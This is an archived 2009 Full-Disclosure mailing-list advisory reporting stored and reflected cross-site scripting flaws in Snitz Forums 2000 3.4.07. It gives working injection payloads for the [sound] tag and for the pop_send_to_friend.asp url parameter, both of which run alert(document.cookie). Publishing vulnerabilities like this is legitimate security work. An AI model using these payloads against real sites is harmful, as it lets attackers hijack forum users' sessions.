[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx, websecurity@xxxxxxxxxxxxx, webappsec@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities
From: Andrea Fabrizi <andrea.fabrizi@xxxxxxxxx>
Date: Thu, 15 Oct 2009 17:50:10 +0200

**************************************************************
Application: Snitz Forums 2000
Version affected:  3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@xxxxxxxxx
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************

###### PERMANENT XSS
If [sound] tag is allowed:

[sound]http://url_to_valid_mp3_or_m3u_file.m3u";
onLoad="alert(document.cookie)[/sound]
######

###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad
="alert(document.cookie)">

Note the space: onLoad<space>="alert(document.cookie)"
######

-- 
Andrea Fabrizi
http://www.andreafabrizi.it

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Drupal XML Sitemap 6.x-1.1 XSS Vulnerability
Next by Date: [Full-disclosure] [ MDVSA-2009:279 ] ocaml-mysql
Previous by thread: Re: [Full-disclosure] Drupal XML Sitemap 6.x-1.1 XSS Vulnerability
Next by thread: [Full-disclosure] [ MDVSA-2009:279 ] ocaml-mysql
Index(es):
- Date
- Thread